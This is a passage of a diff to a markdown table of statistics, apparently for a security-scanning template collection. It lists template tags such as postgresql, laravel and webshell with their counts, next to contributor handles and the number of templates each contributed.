raesene | 2 | | | | | | | +| postgresql | 13 | 6mile | 2 | | | | | | | +| cuppa | 13 | ep1csage | 2 | | | | | | | +| windows | 13 | codexlynx | 2 | | | | | | | +| auth | 13 | florianmaak | 2 | | | | | | | +| laravel | 13 | usdag | 2 | | | | | | | +| graphql | 13 | sbani | 2 | | | | | | | +| doppler | 12 | davidegirardi | 2 | | | | | | | +| webserver | 12 | parzival | 2 | | | | | | | +| drupal | 12 | moritz nentwig | 2 | | | | | | | +| deployments | 12 | y4er | 2 | | | | | | | +| newrelic | 12 | msegoviag | 2 | | | | | | | +| jetbrains | 12 | supr4s | 2 | | | | | | | +| ofbiz | 12 | christianpoeschl | 2 | | | | | | | +| vbulletin | 12 | danielmofer | 2 | | | | | | | +| netsweeper | 12 | lotusdll | 2 | | | | | | | +| kafka | 12 | luci | 2 | | | | | | | +| phpgurukul | 12 | redteambrasil | 2 | | | | | | | +| zimbra | 12 | rafaelwdornelas | 2 | | | | | | | +| smb | 12 | wa1tf0rme | 2 | | | | | | | +| osint-video | 11 | nuk3s3c | 2 | | | | | | | +| spring | 11 | hetroublemakr | 2 | | | | | | | +| dedecms | 11 | ajaysenr | 2 | | | | | | | +| glpi | 11 | afaq | 2 | | | | | | | +| iis | 11 | dbrwsky | 2 | | | | | | | +| xwiki | 11 | ayadim | 2 | | | | | | | +| iam | 11 | n-thumann | 2 | | | | | | | +| jolokia | 11 | zomsop82 | 2 | | | | | | | +| django | 11 | 666asd | 2 | | | | | | | +| xstream | 11 | thevillagehacker | 2 | | | | | | | +| prometheus | 11 | kishore-hariram | 2 | | | | | | | +| hikvision | 11 | serrapa | 2 | | | | | | | +| fastjson | 11 | lstatro | 2 | | | | | | | +| cache | 11 | geekby | 2 | | | | | | | +| phpmyadmin | 10 | paperpen | 2 | | | | | | | +| xstream_project | 10 | ree4pwn | 2 | | | | | | | +| zabbix | 10 | liwermor | 2 | | | | | | | +| db | 10 | 0xcrypto | 2 | | | | | | | +| elasticsearch | 10 | pxmme1337 | 2 | | | | | | | +| dahua | 10 | 0xrudra | 2 | | | | | | | +| dropbox | 10 | joeldeleep | 2 | | | | | | | +| blind | 10 | supras | 2 | | | | | | | +| samsung | 10 | bmcel | 2 | | | | | | | +| digitalocean | 10 | gevakun | 2 | | | | | | | +| solarview | 10 | bsysop | 2 | | | | | | | +| thinkphp | 10 | bananabr | 2 | | | | | | | +| progress | 10 | t3l3machus | 2 | | | | | | | +| sitecore | 10 | hackerarpan | 2 | | | | | | | +| symfony | 10 | foulenzer | 2 | | | | | | | +| solr | 10 | korteke | 2 | | | | | | | +| crlf | 10 | charles d. | 2 | | | | | | | +| exchange | 9 | kre80r | 2 | | | | | | | +| sophos | 9 | sinkettu | 2 | | | | | | | +| cloudtrail | 9 | socketz | 2 | | | | | | | +| sangfor | 9 | 8arthur | 2 | | | | | | | +| elastic | 9 | shelled | 2 | | | | | | | +| python | 9 | 0xsapra | 2 | | | | | | | +| pfsense | 9 | gal nagli | 2 | | | | | | | +| facebook | 9 | thezakman | 2 | | | | | | | +| secret | 9 | thardt-praetorian | 2 | | | | | | | +| bitbucket | 9 | udit_thakkur | 2 | | | | | | | +| gitea | 9 | icarot | 2 | | | | | | | +| versa | 9 | 0xnirvana | 2 | | | | | | | +| druid | 9 | clarkvoss | 2 | | | | | | | +| firebase | 9 | dahse89 | 2 | | | | | | | +| joomla\! | 9 | koti2 | 2 | | | | | | | +| console | 9 | convisoappsec | 2 | | | | | | | +| artica | 9 | mzack9999 | 2 | | | | | | | +| instrusive | 9 | michal mikolas (nanuqcz) | 2 | | | | | | | +| vcenter | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| scada | 9 | joshua rogers | 2 | | | | | | | +| f5 | 9 | mrharshvardhan | 2 | | | | | | | +| lucee | 9 | manas_harsh | 2 | | | | | | | +| cnvd2020 | 9 | joshlarsen | 2 | | | | | | | +| opencats | 9 | streetofhackerr007 | 2 | | | | | | | +| wso2 | 9 | dogancanbakir | 2 | | | | | | | +| gateway | 9 | vavkamil | 2 | | | | | | | +| moodle | 9 | kiblyn11 | 2 | | | | | | | +| kube | 9 | cckuakilong | 2 | | | | | | | +| discord | 8 | amsda | 2 | | | | | | | +| atom | 8 | martincodes-de | 2 | | | | | | | +| phpinfo | 8 | shankaracharya | 2 | | | | | | | +| recon | 8 | nkxxkn | 2 | | | | | | | +| lfprojects | 8 | h0j3n | 2 | | | | | | | +| bucket | 8 | z0ne | 2 | | | | | | | +| nagiosxi | 8 | pbuff07 | 2 | | | | | | | +| mirai | 8 | egemenkochisarli | 2 | | | | | | | +| oauth | 8 | maximus decimus | 2 | | | | | | | +| osint-news | 8 | g4l1t0 | 2 | | | | | | | +| metadata | 8 | v0idc0de | 2 | | | | | | | +| wanhu | 8 | d4vy | 2 | | | | | | | +| mlflow | 8 | 0xelkomy | 2 | | | | | | | +| cacti | 8 | thabisocn | 2 | | | | | | | +| microfocus | 8 | paradessia | 2 | | | | | | | +| cisco-switch | 8 | k11h-de | 2 | | | | | | | +| emerge | 8 | arliya | 2 | | | | | | | +| phpjabbers | 8 | israel comazzetto dos reis | 2 | | | | | | | +| manager | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| spotweb_project | 8 | github.com/its0x08 | 2 | | | | | | | +| symantec | 8 | danmcinerney | 2 | | | | | | | +| unauthenticated | 8 | c3l3si4n | 2 | | | | | | | +| cloud-enum | 8 | amirhossein raeisi | 2 | | | | | | | +| odoo | 8 | sy3omda | 2 | | | | | | | +| solarwinds | 8 | randomdhiraj | 2 | | | | | | | +| config-audit | 8 | myztique | 2 | | | | | | | +| spotweb | 8 | w4cky_ | 2 | | | | | | | +| e-office | 8 | herry | 2 | | | | | | | +| default-page | 8 | bp0lr | 2 | | | | | | | +| huawei | 8 | bing0o | 2 | | | | | | | +| go | 8 | ehsahil | 2 | | | | | | | +| nexus | 8 | topscoder | 2 | | | | | | | +| hms | 8 | 0xsmiley | 2 | | | | | | | +| ognl | 8 | notnotnotveg | 2 | | | | | | | +| openemr | 8 | ritesh_gohil(#l4stpl4y3r) | 2 | | | | | | | +| websphere | 7 | cocxanh | 2 | | | | | | | +| database | 7 | uomogrande | 2 | | | | | | | +| vrealize | 7 | hakimkt | 1 | | | | | | | +| opensis | 7 | sechunt3r | 1 | | | | | | | +| mobileiron | 7 | ramkrishna sawant | 1 | | | | | | | +| ldap | 7 | michael wedl | 1 | | | | | | | +| landray | 7 | william söderberg @ withsecure | 1 | | | | | | | +| teamcity | 7 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| pmb | 7 | ahmed sherif | 1 | | | | | | | +| ruckus | 7 | marcio mendes | 1 | | | | | | | +| fortios | 7 | bywalks | 1 | | | | | | | +| gradio | 7 | aravind | 1 | | | | | | | +| linkedin | 7 | exceed | 1 | | | | | | | +| maps | 7 | ohlinge | 1 | | | | | | | +| nacos | 7 | rojanrijal | 1 | | | | | | | +| mongodb | 7 | sospiro | 1 | | | | | | | +| bigip | 7 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| posh | 3 | alperenkesk | 1 | | | | | | | -| sidekiq | 3 | matt miller | 1 | | | | | | | -| dokuwiki | 3 | sherlocksecurity | 1 | | | | | | | -| netdata | 3 | carson chan | 1 | | | | | | | -| listserv | 3 | dhiyanesdk | 1 | | | | | | | -| getsimple | 3 | official_blackhat13 | 1 | | | | | | | -| watchguard | 3 | mah3sec_ | 1 | | | | | | | -| nifi | 3 | j33n1k4 | 1 | | | | | | | -| poms | 3 | 0xteles | 1 | | | | | | | -| contentful | 3 | ledoubletake | 1 | | | | | | | -| mailgun | 3 | iphantasmic | 1 | | | | | | | -| favicon | 3 | 0xceba | 1 | | | | | | | -| spotify | 3 | remi gascou (podalirius) | 1 | | | | | | | -| dotcms | 3 | juliosmelo | 1 | | | | | | | -| circleci | 3 | abdullahisik | 1 | | | | | | | -| piwigo | 3 | michal-mikolas | 1 | | | | | | | -| netfortris | 3 | osamahamad | 1 | | | | | | | -| phpipam | 3 | wpsec | 1 | | | | | | | -| webkul-qloapps | 3 | amir-h-fallahi | 1 | | | | | | | -| openam | 3 | intx0x80 | 1 | | | | | | | -| joomlacomponent.inetlanka | 3 | xeldax | 1 | | | | | | | -| credential | 3 | r3s ost | 1 | | | | | | | -| trixbox | 3 | yusakie | 1 | | | | | | | -| temenos | 3 | 0xtavian | 1 | | | | | | | -| hsphere | 3 | ruppde | 1 | | | | | | | -| rstudio | 3 | manuelbua | 1 | | | | | | | -| glassfish | 3 | caon | 1 | | | | | | | -| covenant | 3 | evan rubinstien | 1 | | | | | | | -| afterlogic | 3 | bartu utku sarp | 1 | | | | | | | -| ninjaforms | 3 | pussycat0 | 1 | | | | | | | -| chatgpt | 3 | apt-mirror | 1 | | | | | | | -| messaging | 3 | ofjaaah | 1 | | | | | | | -| passive | 3 | whynotke | 1 | | | | | | | -| digital-watchdog | 3 | dale clarke | 1 | | | | | | | -| mpsec | 3 | yavolo | 1 | | | | | | | -| wpdeveloper | 3 | hüseyin tintaş | 1 | | | | | | | -| pypi | 3 | sttlr | 1 | | | | | | | -| webtareas | 3 | geraldino2 | 1 | | | | | | | -| e-mobile | 3 | dwbzn | 1 | | | | | | | -| cpanel | 3 | anonymous | 1 | | | | | | | -| geowebserver | 3 | godfatherorwa | 1 | | | | | | | -| dos | 3 | noah @thesubtlety | 1 | | | | | | | -| western_digital | 3 | charanrayudu | 1 | | | | | | | -| evlink | 3 | myst7ic | 1 | | | | | | | -| purchase-order | 3 | unp4ck | 1 | | | | | | | -| h2o | 3 | nobody | 1 | | | | | | | -| shell | 3 | elouhi | 1 | | | | | | | -| mythic | 3 | ramkrishna sawant | 1 | | | | | | | -| droneci | 3 | allenwest24 | 1 | | | | | | | -| webnus | 3 | kaizensecurity | 1 | | | | | | | -| idrac | 3 | amanrawat | 1 | | | | | | | -| finecms | 3 | kareemse1im | 1 | | | | | | | -| apollo | 3 | shockwave | 1 | | | | | | | -| ampps | 3 | igibanez | 1 | | | | | | | -| cluster | 3 | husain | 1 | | | | | | | -| rancher | 3 | couskito | 1 | | | | | | | -| xxljob | 3 | 1nf1n7y | 1 | | | | | | | -| webadmin | 3 | flag007 | 1 | | | | | | | -| r-seenet | 3 | 8authur | 1 | | | | | | | -| processwire | 3 | mammad_rahimzada | 1 | | | | | | | -| buffalo | 3 | andirrahmani1 | 1 | | | | | | | -| copyparty | 3 | smaranchand | 1 | | | | | | | -| teampass | 3 | sickwell | 1 | | | | | | | -| modem | 3 | m0ck3d | 1 | | | | | | | -| bash | 3 | liquidsec | 1 | | | | | | | -| softwarepublico | 3 | gonski | 1 | | | | | | | -| openwrt | 3 | ahmed sherif | 1 | | | | | | | -| clusterengine | 3 | higor melgaço (eremit4) | 1 | | | | | | | -| cas | 3 | kchason | 1 | | | | | | | -| fuelcms | 3 | domenicoveneziano | 1 | | | | | | | -| axway | 3 | savik | 1 | | | | | | | -| telnet | 3 | jna1 | 1 | | | | | | | -| lotus | 3 | professorabhay | 1 | | | | | | | -| forgerock | 3 | lady_bug | 1 | | | | | | | -| thinfinity | 3 | jadu101 | 1 | | | | | | | -| imap | 3 | hotpot | 1 | | | | | | | -| backdropcms | 3 | viondexd | 1 | | | | | | | -| lighttpd | 3 | floriandewald | 1 | | | | | | | -| pulsar | 3 | imhunterand | 1 | | | | | | | -| nuget | 3 | prettyboyaaditya | 1 | | | | | | | -| netlify | 3 | yiran | 1 | | | | | | | -| itop | 3 | 0ut0fb4nd | 1 | | | | | | | -| cgi | 3 | makyotox | 1 | | | | | | | -| monitorr | 3 | diablo | 1 | | | | | | | -| siemens | 3 | breno_css | 1 | | | | | | | -| dzzoffice | 3 | ratnadip gajbhiye | 1 | | | | | | | -| switch | 3 | vzamanillo | 1 | | | | | | | -| boldgrid | 3 | d0rkerdevil | 1 | | | | | | | -| httpbin | 3 | 0xd0ff9 | 1 | | | | | | | -| draytek | 3 | alex | 1 | | | | | | | -| sharefile | 3 | shiar | 1 | | | | | | | -| xoops | 3 | viniciuspereiras | 1 | | | | | | | -| superadmin | 3 | 0xceeb | 1 | | | | | | | -| fanwei | 3 | h4sh5 | 1 | | | | | | | -| nc | 3 | pwnwithlove | 1 | | | | | | | -| qlik | 3 | _harleo | 1 | | | | | | | -| magnolia | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| javascript | 3 | aron molnar | 1 | | | | | | | -| reddit | 3 | adrianmf | 1 | | | | | | | -| ueditor | 3 | wlayzz | 1 | | | | | | | -| weiphp | 3 | thelicato | 1 | | | | | | | -| soplanning | 3 | ransomsec | 1 | | | | | | | -| electron | 3 | 0xparth | 1 | | | | | | | -| discourse | 3 | watchtowr | 1 | | | | | | | -| complete_online_job_search_system_project | 3 | marcio mendes | 1 | | | | | | | -| axis | 3 | rumble773 | 1 | | | | | | | -| wwbn | 3 | elmahdi | 1 | | | | | | | -| voipmonitor | 3 | mass0ma | 1 | | | | | | | -| monitor | 3 | jc175 | 1 | | | | | | | -| instagram | 3 | numan türle | 1 | | | | | | | -| segment | 3 | shifacyclewla | 1 | | | | | | | +| telesquare | 7 | sinsinology | 1 | | | | | | | +| nortekcontrol | 7 | unblvr1 | 1 | | | | | | | +| squirrelmail | 7 | hateshape | 1 | | | | | | | +| exploitdb | 7 | mhdsamx | 1 | | | | | | | +| slack | 7 | piyushchhiroliya | 1 | | | | | | | +| error | 7 | k3rwin | 1 | | | | | | | +| activemq | 7 | httpvoid | 1 | | | | | | | +| twitter | 7 | xcapri | 1 | | | | | | | +| contec | 7 | floriandewald | 1 | | | | | | | +| filemanager | 7 | domenicoveneziano | 1 | | | | | | | +| blockchain | 7 | y0no | 1 | | | | | | | +| car_rental_management_system_project | 7 | ipanda | 1 | | | | | | | +| oos | 7 | jc175 | 1 | | | | | | | +| vms | 7 | 8authur | 1 | | | | | | | +| rfi | 7 | elitebaz | 1 | | | | | | | +| bloofox | 7 | francescocarlucci | 1 | | | | | | | +| fpd | 7 | unp4ck | 1 | | | | | | | +| avtech | 7 | kaizensecurity | 1 | | | | | | | +| monstra | 7 | luqmaan hadia | 1 | | | | | | | +| vpc | 7 | erethon | 1 | | | | | | | +| gogs | 7 | remi gascou (podalirius) | 1 | | | | | | | +| moodating | 7 | 0xprial | 1 | | | | | | | +| keking | 7 | jna1 | 1 | | | | | | | +| pods | 7 | xshuden | 1 | | | | | | | +| shopify | 7 | mys7ic | 1 | | | | | | | +| beyondtrust | 6 | daviey | 1 | | | | | | | +| microstrategy | 6 | notwhy | 1 | | | | | | | +| flutterwave | 6 | mrcl0wnlab | 1 | | | | | | | +| online_fire_reporting_system_project | 6 | bad5ect0r | 1 | | | | | | | +| webmin | 6 | exid | 1 | | | | | | | +| doctor-appointment-system | 6 | youngpope | 1 | | | | | | | +| keycloak | 6 | mubassirpatel | 1 | | | | | | | +| advantech | 6 | f1she3 | 1 | | | | | | | +| bmc | 6 | stupidfish | 1 | | | | | | | +| server | 6 | shiar | 1 | | | | | | | +| jetty | 6 | pdp | 1 | | | | | | | +| asp | 6 | w8ay | 1 | | | | | | | +| typo3 | 6 | nobody | 1 | | | | | | | +| online-fire-reporting | 6 | blckraven | 1 | | | | | | | +| log | 6 | vinit989 | 1 | | | | | | | +| paloaltonetworks | 6 | th3r4id | 1 | | | | | | | +| gcp | 6 | osamahamad | 1 | | | | | | | +| doctor_appointment_system_project | 6 | nielsing | 1 | | | | | | | +| leak | 6 | chetgan | 1 | | | | | | | +| chanjet | 6 | shelld3v | 1 | | | | | | | +| tikiwiki | 6 | tirtha | 1 | | | | | | | +| servicenow | 6 | droberson | 1 | | | | | | | +| sql | 6 | 0xparth | 1 | | | | | | | +| mikrotik | 6 | allenwest24 | 1 | | | | | | | +| minio | 6 | anonymous | 1 | | | | | | | +| plesk | 6 | notsoevilweasel | 1 | | | | | | | +| cockpit | 6 | amir-h-fallahi | 1 | | | | | | | +| synacor | 6 | freakyclown | 1 | | | | | | | +| sonarqube | 6 | chron0x | 1 | | | | | | | +| 74cms | 6 | h4kux | 1 | | | | | | | +| rat | 6 | akshansh | 1 | | | | | | | +| liferay | 6 | 0h1in9e | 1 | | | | | | | +| openvpn | 6 | hczdmr | 1 | | | | | | | +| couchdb | 6 | mariam tariq | 1 | | | | | | | +| jamf | 6 | 0xceba | 1 | | | | | | | +| zhiyuan | 6 | banana69 | 1 | | | | | | | +| magmi | 6 | harryha | 1 | | | | | | | +| cobbler | 6 | nuts7 | 1 | | | | | | | +| asus | 6 | kresec | 1 | | | | | | | +| express | 6 | shreyapohekar | 1 | | | | | | | +| geoserver | 6 | clment cruchet | 1 | | | | | | | +| kubelet | 6 | fmunozs | 1 | | | | | | | +| jeecg | 6 | kishore krishna (sillydaddy) | 1 | | | | | | | +| paypal | 6 | micha3lb3n | 1 | | | | | | | +| splunk | 6 | erikowen | 1 | | | | | | | +| elfinder | 6 | 5up3r541y4n | 1 | | | | | | | +| security | 6 | miroslavsotak | 1 | | | | | | | +| thedigitalcraft | 5 | drewvravick | 1 | | | | | | | +| elementor | 5 | majidmc2 | 1 | | | | | | | +| decision-center | 5 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| blackenergy | 5 | 0xh7ml | 1 | | | | | | | +| avaya | 5 | pascalheidmann | 1 | | | | | | | +| telerik | 5 | kagamigawa | 1 | | | | | | | +| percha | 5 | eremit4 | 1 | | | | | | | +| ems | 5 | tangxiaofeng7 | 1 | | | | | | | +| schneider-electric | 5 | _harleo | 1 | | | | | | | +| crushftp | 5 | mbmy | 1 | | | | | | | +| sysaid | 5 | xc1ym | 1 | | | | | | | +| chamilo | 5 | d0rkerdevil | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | hyunsoo-ds | 1 | | | | | | | +| firmware | 5 | retr0 | 1 | | | | | | | +| spark | 5 | carson chan | 1 | | | | | | | +| caucho | 5 | arall | 1 | | | | | | | +| carrental | 5 | aayush vishnoi | 1 | | | | | | | +| http | 5 | axrk | 1 | | | | | | | +| connectwise | 5 | pry0cc | 1 | | | | | | | +| circarlife | 5 | udyz | 1 | | | | | | | +| tibco | 5 | nerrorsec | 1 | | | | | | | +| nuuo | 5 | matt miller | 1 | | | | | | | +| digitaldruid | 5 | naglis | 1 | | | | | | | +| swagger | 5 | jbaines-r7 | 1 | | | | | | | +| pyload | 5 | mukundbhuva | 1 | | | | | | | +| magmi_project | 5 | opencirt | 1 | | | | | | | +| tenda | 5 | yashanand155 | 1 | | | | | | | +| craftcms | 5 | regala_ | 1 | | | | | | | +| cdata | 5 | r3nz0 | 1 | | | | | | | +| gnu | 5 | imhunterand | 1 | | | | | | | +| matrix | 5 | j33n1k4 | 1 | | | | | | | +| metinfo | 5 | savik | 1 | | | | | | | +| redmine | 5 | luskabol | 1 | | | | | | | +| cnvd2023 | 5 | pudsec | 1 | | | | | | | +| sftp | 5 | manasmbellani | 1 | | | | | | | +| hybris | 5 | dali | 1 | | | | | | | +| axigen | 5 | 0xd0ff9 | 1 | | | | | | | +| gocd | 5 | metascan | 1 | | | | | | | +| webview | 5 | _darrenmartyn | 1 | | | | | | | +| strapi | 5 | omarkurt | 1 | | | | | | | +| acm | 5 | geraldino2 | 1 | | | | | | | +| openstack | 5 | yusakie | 1 | | | | | | | +| sentry | 5 | thebinitghimire | 1 | | | | | | | +| fatpipe | 5 | diablo | 1 | | | | | | | +| cve2007 | 5 | manuelbua | 1 | | | | | | | +| hoteldruid | 5 | sec_hawk | 1 | | | | | | | +| kkfileview | 5 | byobin | 1 | | | | | | | +| adb | 5 | 0xceeb | 1 | | | | | | | +| openai | 5 | ringo | 1 | | | | | | | +| papercut | 5 | akokonunes | 1 | | | | | | | +| akamai | 5 | apt-mirror | 1 | | | | | | | +| storage | 5 | wlayzz | 1 | | | | | | | +| avideo | 5 | jiheon-dev | 1 | | | | | | | +| agentejo | 5 | 0xrod | 1 | | | | | | | +| etcd | 5 | lingtren | 1 | | | | | | | +| parallels | 5 | thelicato | 1 | | | | | | | +| 10web | 5 | nan-kl | 1 | | | | | | | +| mantisbt | 5 | ptonewreckin | 1 | | | | | | | +| glpi-project | 5 | mlec | 1 | | | | | | | +| graylog | 5 | jrolf | 1 | | | | | | | +| dionaea | 5 | knassar702 | 1 | | | | | | | +| rseenet | 5 | zn9988 | 1 | | | | | | | +| checkpoint | 5 | elmahdi | 1 | | | | | | | +| api-server | 5 | kiransau | 1 | | | | | | | +| adminer | 5 | p-l- | 1 | | | | | | | +| openfire | 5 | cbadke | 1 | | | | | | | +| goanywhere | 5 | team syslifters / christoph | 1 | | | | | | | +| | | mahrl | | | | | | | | +| wbce | 5 | sshell | 1 | | | | | | | +| webkul | 5 | whotwagner | 1 | | | | | | | +| xmlrpc | 5 | fur1na | 1 | | | | | | | +| jupyter | 5 | chesterblue | 1 | | | | | | | +| cloudflare | 5 | adnanekhan | 1 | | | | | | | +| wpdevart | 5 | zhenwarx | 1 | | | | | | | +| mssql | 5 | deena | 1 | | | | | | | +| qnap | 5 | 0xteles | 1 | | | | | | | +| genetechsolutions | 5 | invisiblethreat | 1 | | | | | | | +| awstats | 5 | mchklt | 1 | | | | | | | +| jabber | 5 | higor melgaço (eremit4) | 1 | | | | | | | +| react | 5 | dabla | 1 | | | | | | | +| web3 | 5 | jonathanwalker | 1 | | | | | | | +| hpe | 5 | iampritam | 1 | | | | | | | +| totolink | 5 | kurohost | 1 | | | | | | | +| password | 5 | sw0rk17 | 1 | | | | | | | +| zzzcms | 5 | juliosmelo | 1 | | | | | | | +| froxlor | 5 | pphuahua | 1 | | | | | | | +| resin | 5 | evan rubinstien | 1 | | | | | | | +| ethereum | 5 | shivanshkhari | 1 | | | | | | | +| circontrol | 5 | marcos_iaf | 1 | | | | | | | +| open-emr | 5 | orpheus | 1 | | | | | | | +| terramaster | 5 | ky9oss | 1 | | | | | | | +| qdpm | 5 | lrtk-coder | 1 | | | | | | | +| jwt | 5 | pepitoh | 1 | | | | | | | +| asana | 5 | apple | 1 | | | | | | | +| apisix | 5 | shifacyclewla | 1 | | | | | | | +| square | 5 | vthiery | 1 | | | | | | | +| voip | 5 | rubina119 | 1 | | | | | | | +| containers | 4 | anon-artist | 1 | | | | | | | +| pixie | 4 | sickwell | 1 | | | | | | | +| mcafee | 4 | queencitycyber | 1 | | | | | | | +| bamboo | 4 | lethargynavigator | 1 | | | | | | | +| ghost | 4 | bughuntersurya | 1 | | | | | | | +| learnpress | 4 | qianbenhyu | 1 | | | | | | | +| os4ed | 4 | michal-mikolas | 1 | | | | | | | +| reprisesoftware | 4 | aaban solutions | 1 | | | | | | | +| sigb | 4 | bartu utku sarp | 1 | | | | | | | +| dotnet | 4 | co0nan | 1 | | | | | | | +| concrete | 4 | kchason | 1 | | | | | | | +| owncloud | 4 | alevsk | 1 | | | | | | | +| mostracms | 4 | puben | 1 | | | | | | | +| linksys | 4 | pjborah | 1 | | | | | | | +| myeventon | 4 | harshinsecurity | 1 | | | | | | | +| d-link | 4 | alex | 1 | | | | | | | +| env | 4 | furkansenan | 1 | | | | | | | +| datadog | 4 | jaskaran | 1 | | | | | | | +| easypost | 4 | caon | 1 | | | | | | | +| codeigniter | 4 | hakluke | 1 | | | | | | | +| intelbras | 4 | davidfegyver | 1 | | | | | | | +| horde | 4 | yashvardhantripathi | 1 | | | | | | | +| httpserver | 4 | west-wise | 1 | | | | | | | +| kevinlab | 4 | ldionmarcil | 1 | | | | | | | +| mailchimp | 4 | josecosta | 1 | | | | | | | +| audiocodes | 4 | amirmsafari | 1 | | | | | | | +| h3c | 4 | therealtoastycat | 1 | | | | | | | +| pega | 4 | amanrawat | 1 | | | | | | | +| puppet | 4 | aringo-bf | 1 | | | | | | | +| gnuboard | 4 | kr1shna4garwal | 1 | | | | | | | +| figma | 4 | screamy | 1 | | | | | | | +| info | 4 | revblock | 1 | | | | | | | +| pie-register | 4 | retr02332 | 1 | | | | | | | +| cnvd2019 | 4 | flag007 | 1 | | | | | | | +| fit2cloud | 4 | af001 | 1 | | | | | | | +| panos | 4 | galoget | 1 | | | | | | | +| kibana | 4 | mantissts | 1 | | | | | | | +| flink | 4 | berkdusunur | 1 | | | | | | | +| hongdian | 4 | remonsec | 1 | | | | | | | +| igniterealtime | 4 | sherlocksecurity | 1 | | | | | | | +| pmb_project | 4 | amnotacat | 1 | | | | | | | +| mostra | 4 | themiddle | 1 | | | | | | | +| wp-statistics | 4 | duty_1g | 1 | | | | | | | +| panabit | 4 | 0xcharan | 1 | | | | | | | +| veronalabs | 4 | kba@sogeti_esec | 1 | | | | | | | +| auieo | 4 | rumble773 | 1 | | | | | | | +| dom | 4 | colbyjack1134 | 1 | | | | | | | +| rabbitmq | 4 | un-fmunozs | 1 | | | | | | | +| tiki | 4 | none | 1 | | | | | | | +| cnvd2022 | 4 | 2rs3c | 1 | | | | | | | +| newstatpress | 4 | rschio | 1 | | | | | | | +| arcgis | 4 | spac3wh1te | 1 | | | | | | | +| metersphere | 4 | igibanez | 1 | | | | | | | +| springcloud | 4 | ndmalc | 1 | | | | | | | +| esri | 4 | w0tx | 1 | | | | | | | +| flatpress | 4 | rinolock | 1 | | | | | | | +| metabase | 4 | gpiechnik2 | 1 | | | | | | | +| aria | 4 | ooooooo_q | 1 | | | | | | | +| codoso | 4 | jas37 | 1 | | | | | | | +| osgeo | 4 | f0xy | 1 | | | | | | | +| metasploit | 4 | kareemse1im | 1 | | | | | | | +| eclipse | 4 | fq_hsu | 1 | | | | | | | +| powerjob | 4 | adilsoybali | 1 | | | | | | | +| nextjs | 4 | miryangjung | 1 | | | | | | | +| angular | 4 | abdullahisik | 1 | | | | | | | +| rocketchat | 4 | technicaljunkie | 1 | | | | | | | +| osint-archived | 4 | godfatherorwa | 1 | | | | | | | +| ternaria | 4 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| confluent | 4 | hel10-web | 1 | | | | | | | +| juniper | 4 | carlosvieira | 1 | | | | | | | +| yeswiki | 4 | compr00t | 1 | | | | | | | +| articatech | 4 | juicypotato1 | 1 | | | | | | | +| candidats | 4 | 0ut0fb4nd | 1 | | | | | | | +| grav | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| prtg | 4 | push4d | 1 | | | | | | | +| jellyfin | 4 | jfbes | 1 | | | | | | | +| terra-master | 4 | 0xtavian | 1 | | | | | | | +| age-encryption | 4 | stux | 1 | | | | | | | +| proftpd | 4 | am0nt31r0 | 1 | | | | | | | +| rubyonrails | 4 | ramondunker | 1 | | | | | | | +| sendgrid | 4 | mayank_pandey01 | 1 | | | | | | | +| roxy | 4 | millermedia | 1 | | | | | | | +| newstatpress_project | 4 | myst7ic | 1 | | | | | | | +| shiro | 4 | borna nematzadeh | 1 | | | | | | | +| postmessage | 4 | justmumu | 1 | | | | | | | +| httpd | 4 | m0ck3d | 1 | | | | | | | +| consul | 4 | furkansayim | 1 | | | | | | | +| hongfan | 4 | danigoland | 1 | | | | | | | +| flickr | 4 | narluin | 1 | | | | | | | +| djangoproject | 4 | fpatrik | 1 | | | | | | | +| eyoucms | 4 | ledoubletake | 1 | | | | | | | +| cve2005 | 4 | abbas.heybati | 1 | | | | | | | +| ebs | 4 | ofjaaah | 1 | | | | | | | +| joomlamo | 4 | aron molnar | 1 | | | | | | | +| creativeitem | 4 | petruknisme | 1 | | | | | | | +| seagate | 4 | mammad_rahimzada | 1 | | | | | | | +| jsf | 4 | schniggie | 1 | | | | | | | +| dahuasecurity | 4 | sicksec | 1 | | | | | | | +| kentico | 4 | skylark-lab | 1 | | | | | | | +| kyocera | 4 | yavolo | 1 | | | | | | | +| zend | 4 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| kingsoft | 4 | jeya.seelan | 1 | | | | | | | +| mitel | 4 | paper-pen | 1 | | | | | | | +| webshell | 4 | rotembar | 1 | | | | | | | +| supsystic | 4 | dk999 | 1 | | | | | | | +| artifactory | 4 | arr0way | 1 | | | | | | | +| nosqli | 4 | tehtbl | 1 | | | | | | | +| phppgadmin | 4 | bugvsme | 1 | | | | | | | +| ray | 4 | jbertman | 1 | | | | | | | +| churchcrm | 4 | open-sec | 1 | | | | | | | +| mooveagency | 4 | yiran | 1 | | | | | | | +| ransomware | 4 | ilovebinbash | 1 | | | | | | | +| aura | 4 | rotemreiss | 1 | | | | | | | +| globalprotect | 4 | pratik khalane | 1 | | | | | | | +| jorani | 4 | shockwave | 1 | | | | | | | +| pentaho | 4 | d4ly | 1 | | | | | | | +| pluginus | 4 | dale clarke | 1 | | | | | | | +| hospital_management_system_project | 4 | exploitation | 1 | | | | | | | +| harbor | 4 | ling | 1 | | | | | | | +| stripe | 4 | couskito | 1 | | | | | | | +| imgproxy | 4 | vzamanillo | 1 | | | | | | | +| wireguard | 4 | jacalynli | 1 | | | | | | | +| bitrix | 4 | phyr3wall | 1 | | | | | | | +| dolibarr | 4 | jub0bs | 1 | | | | | | | +| ampache | 4 | miguelsegoviagil | 1 | | | | | | | +| webmail | 4 | olewagner | 1 | | | | | | | +| thimpress | 4 | irshadahamed | 1 | | | | | | | +| linkerd | 4 | realexp3rt | 1 | | | | | | | +| royalevent | 4 | undefl0w | 1 | | | | | | | +| umbraco | 4 | shiva (strobes security) | 1 | | | | | | | +| okta | 4 | petergrifin | 1 | | | | | | | +| wcs | 4 | mohammad reza omrani | | 1 | | | | | | | +| | | @omranisecurity | | | | | | | | +| phpjabber | 4 | philippdelteil | 1 | | | | | | | +| moveit | 4 | iphantasmic | 1 | | | | | | | +| salesforce | 4 | shivampand3y | 1 | | | | | | | +| opencms | 4 | mah3sec_ | 1 | | | | | | | +| search | 4 | viniciuspereiras | 1 | | | | | | | +| aspose | 4 | defektive | 1 | | | | | | | 